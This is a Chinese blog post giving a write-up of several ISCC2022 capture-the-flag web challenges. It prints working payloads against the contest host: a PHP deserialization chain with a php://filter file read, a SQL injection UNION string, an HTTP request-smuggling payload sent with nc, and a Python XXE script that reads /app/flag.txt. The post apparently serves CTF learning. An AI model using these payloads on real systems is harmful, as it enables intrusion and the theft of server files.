ISCC2022WP--WEB

最新推荐文章于 2024-08-02 18:21:33 发布
最新推荐文章于 2024-08-02 18:21:33 发布
阅读量224 收藏 1
点赞数
文章标签: 前端 php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61632010/article/details/127219217
版权

Web1-冬奥会

解题步骤

打开靶机后,通过阅读界面PHP代码进行审计,得出payload后得解

具体描述

打开靶机

 

通过分析PHP代码进行代码审计,得到payload:http://59.110.159.206:7060/?Information={%22year%22:%222022a%22,%22items%22:[%22skiin%22,%20[%22test%22],%200]}

【当满足代码中的两个条件之时,界面会打印出flag】

 

解题收获

通过分析php代码,了解了基本的php代码含义

Web3-pop2022

解题步骤

打开靶机后,依然是php代码审计,发现与反序列化有关,进行求解,得出字符串后用base64进行解码

具体描述

打开后通过反序列化得出payload:

http://59.110.159.206:7050/?wish=O%3A12%3A%22Road_is_Long%22%3A2%3A%7Bs%3A4%3A%22page%22%3BO%3A12%3A%22Road_is_Long%22%3A2%3A%7Bs%3A4%3A%22page%22%3Bs%3A3%3A%22aaa%22%3Bs%3A6%3A%22string%22%3BO%3A13%3A%22Make_a_Change%22%3A1%3A%7Bs%3A6%3A%22effort%22%3BO%3A13%3A%22Try_Work_Hard%22%3A1%3A%7Bs%3A3%3A%22var%22%3Bs%3A57%3A%22php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3Dflag.php%22%3B%7D%7D%7Ds%3A6%3A%22string%22%3BN%3B%7D

 

最后通过base64解码得出flag

解题收获

学习到了php反序列化的相关知识

Web4- Easy-SQL

解题步骤

通过SQL注入得出flag

具体描述

打开靶机

 

先想到是否需要SQL注入,通过?id=1得到一些数据,通过POST传入【username=admin' union select 'admin','admin','admin'#&passwd=admin】得到flag

解题收获

学习到了布尔盲注和利用burp suite进行POST传参

Web5-让我康康

解题步骤

请求走私漏洞

参考文章:http://www.hackdig.com/10/hack-519692.html

多次复现得到payload

具体描述

Payload :

echo -en "GET / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 90\r\nSec-Websocket-Key1: x\r\n\r\nxxxxxxxxGET /fl4g HTTP/1.1\r\nHost: localhost\r\nsecr3t_ip:127.0.0.1\r\nContent-Length: 55\r\n\r\nGET / HTTP/1.1\r\nHost: 127.0.0.1:80\r\n\r\n" | nc 59.110.159.206 7020

通过kali终端运行拿到flag

 

解题收获

学习了WAF防火墙绕过,请求走私漏洞

Web6-findme

解题步骤

打开靶机,文件包含获得flag

具体描述

Payload: http://59.110.159.206:8030/flllHL91244ggg-SecR1et.txt

获取flag

解题收获

学习了文件包含

Web7-这是一道代码审计题

解题步骤

通过脚本获取payload来得到flag

具体描述

Payload  python脚本

url = 'http://59.110.159.206:8040/mti3ljaumc4x/codelogin'
cookie = 'login=1; a_cookie=aW4gZmFjdCBjb29raWUgaXMgdXNlZnVsIQ=='
payload = &apos;&apos;&apos;<?xml version = "1.0"?><!DOCTYPE ANY [<!ENTITY foo SYSTEM "file:///app/flag.txt">]><user><name>&foo;</name><password>pysnow</password></user>&apos;&apos;&apos;
data = {&apos;data&apos;: payload}
r = requests.post(url, data=payload, headers={&apos;Content-Type&apos;: &apos;text/xml&apos;})
print(r.text)

打开题目进入index路由,将cookie:login=0改为1,然后get传参url=xxx,随便传一个获取到一个提示/static/xx,然后可以发现一大堆emoji表情,直接http://www.atoolbox.net/Tool.php?Id=937上面解码拿到源码,审计源码发现是一个ssrf的题,注意这一串代码

然后可以猜测一下这个addr就是127.0.0.1,编码一下就是MTI3LjAuMC4x,传参url=http://@MTI3LjAuMC4x,可以获得提示

给了一个cookie,然后我们直接带着这个cookie去访问这个路由就行

查看源代码发现很明显是一个xxe,而且这个title提示了flag的位置在./flag.txt里面,可以猜测这个flag的位置就在/app/flag.txt,然后直接x就行,脚本就是最开始写的那一个

解题收获

代码审计

Web8-爱国敬业好青年

解题步骤

利用burp suite进行POST 传参得到flag

具体描述

 

解题收获

POST 传参

AbysSun2004
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ISCC2022题目附件
06-06
2022ISCC所有题目附件,包含ISCC2022-练武题附件和ISCC2022-擂台题附件 信息安全已涉及到国家政治、经济、文化、社会和生态文明的建设,信息系统越发展到它的高级阶段,人们对其依赖性就越强,从某种程度上讲其越...
ISCC2022--Writeup
m0_61596829的博客
06-03 6567
ISCC2022--writeup
ISCC web题复现
m0_62422842的博客
06-05 1361
第一次参加ISCC线上赛,感觉题目质量还是挺好的,擂台赛都是大佬们的主场,向我这样的小白也只能学学新东西。在此总结做过的web题目以及相关知识点。
ISCC-2022 部分wp
m0_67393342的博客
09-09 1462
深知大多数初中级Java工程师,想要提升技能,往往是自己摸索成长或者是报班学习,但对于培训机构动则近万的学费,着实压力不小。自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《Java开发全套学习资料》送给大家,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友,同时减轻大家的负担。
ISCC 2022 部分
BvxiE的博客
06-10 1320
这里写自定义目录标题 <?php show_source(__FILE__); $Step1=False; $Step2=False; $info=(array)json_decode(@$_GET['Information']); if(is_array($info)){ var_dump($info); is_numeric(@$info["year"])?die("Sorry~"):NULL; if(@$info["year"]){ ($inf
ISCC 2022 wp
akxnxbshai的博客
06-09 6708
ISCC 2022 部分题目的解题过程。
ISCC-2015-细节决定成败.rar
09-30
标题“ISCC-2015-细节决定成败.rar”暗示了这个压缩包可能包含的是一个关于2015年国际软件构造大会(ISCC)的资料集,其中的重点是讨论了在软件开发过程中细节的重要性。ISCC是一个专注于软件构造、编程方法、软件工程...
ISCC-2020-J07
03-26
【标题】"ISCC-2020-J07"是一个可能代表某个IT竞赛或项目的标识符,可能是2020年ISCC(International Symposium on Computer and Communication)的一部分,分类为J07,这通常意味着它属于特定的技术或研究领域。...
ISCC2021-MISC部分题目.zip
08-07
ISCC2021-MISC部分题目.zip是一个与ISCC(International Symposium on Computer Science and Convergence,国际计算机科学与融合大会)相关的压缩包文件。这个压缩包可能包含了该会议的多份论文、研究报告或者竞赛...
ISCC-2020-J06
02-14
标题“ISCC-2020-J06”可能指的是一个特定的项目、研究或活动,其中“ISCC”可能是“International Symposium on Computer and Communication”的缩写,这可能是一个关于计算机与通信领域的国际研讨会。而“2020”则...
[CTF]-ISCC2022复现
Mr.木Mu
05-26 7492
[CTF]-ISCC2022复现前言Misc2022冬奥会单板小将苏翊鸣隐秘的信息降维打击藏在星空中的诗-1藏在星空里的诗-2真相只有一个套中套666(擂台)Web冬奥会Pop2022这是一道代码审计题Easy-SQL让我康康findme爱国敬业好青年-2总结 前言 一年一度的ISCC终于结束,题目质量很高,高到做不出来 讲道理,擂台题是真的为了出题而出题,真的卷不动了 以下是自己整理的wp,有详有略,感谢师傅们借鉴思路 Misc 2022冬奥会 图片CRC值报错 修改高度 得到unicode编码
ISCC2022wp
h_adam的博客
06-13 2477
练武题,套中套,隐秘的信息,findme,Pop2022,East-SQL,让我康康,这是一道代码审计题,GetTheTable,Sad Code,Amy‘s Code,Bob’s Code,擂台,Melody
2022ISCC-web-wp
Christ1na的博客
07-07 2503
2022ISCC-web-wp
iscc-2022
zhhhb1005的博客
06-05 1022
分析题目,info被强制转换成为数组,get传参 information ,同时要满足step1和step2才能得到flag。step1要求year=2022step2要求item为三个值的数组,第一个值为数组payload pop2022 看开头意思是如果使用get的wish传参那么就反序列化这个wish,如果不是则显示源代码。 流程 exp payload: get传参,然后将结果base64解密。 访问/ypHeMPardErE.zip ,得到源码 这⾥之前可以判断
前端Web-JavaScript(上)
Yu2uki的博客
07-31 1557
JavaScript(简称:JS) 是一门跨平台、面向对象的脚本语言,是用来控制网页行为的,实现人机交互效果。JavaScript 和 Java 是完全不同的语言,不论是概念还是设计。但是基础语法类似。组成:ECMAScript: 规定了JS基础语法核心知识,包括变量、数据类型、流程控制、函数、对象等。BOM:浏览器对象模型,用于操作浏览器本身,如:页面弹窗、地址栏操作、关闭窗口等。DOM:文档对象模型,用于操作HTML文档,如:改变标签内的内容、改变标签内字体样式等。
高德地图离线版 使用高德地图api的方法
m0_62336925的博客
08-02 466
然因为高德地图的瓦片地图太大,所以要让后端部署下 前端直接调用 如果本地 直接找到瓦片图路径就可以。这个代码把你想用的方法名保存到本地。这个时候会报错 因为没有这个方法。然后就可以正常使用这个方法拉。然后使用他的离线方法。找到对应的名字 复制。
html+css+js实现一个简单的电商商城首页
最新发布
爱敲代码的卡拉米的博客
08-02 230
很多刚入门编程的小白学习了基础语法,却不知道语法的用途,不知道如何加深映像,不知道如何提升自己,这个时候每天刷自主刷一些题就非常重要(百炼成神),可以去牛客网上的编程初学者入门训练。2.💗【👇🏻👇🏻👇🏻关注我| 获取更多源码 | 优质文章】 带您学习各种前端插件、3D炫酷效果、图片展示、文字效果、以及整站模板 、大学生毕业HTML模板 、期末大作业模板 、等!绿泡泡:XiaoMei_NN。
【分享】前端程序员-技术网站推荐
一位前行者的博客
07-30 961
对于前端开发人员来说,以下是一些推荐的技术网站,这些网站提供了丰富的资源和知识,可以帮助你提升前端开发技能:收集一些 、、 的网站 vite 官方中文文档 element-plus 官方中文文档 pinia 官方中文文档 vue-router 官方中文文档 Tailwind CSS 官方文档 vitest 官方中文文档 es6 中文文档 axios 官方中文文档 vxetable 官方中文文档 lodash 中文文档 echarts 官方中文文档 animat
ISCC where
09-08
ISCC是指"Intelligent Self-Configuring Cluster",其中的"ISCC"表示智能自配置集群。在ISCC中,有两种集群形式,一种是分散式集群,另一种是集中式集群。在分散式集群中,每个节点都有潜力成为簇头,而在集中式集群...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值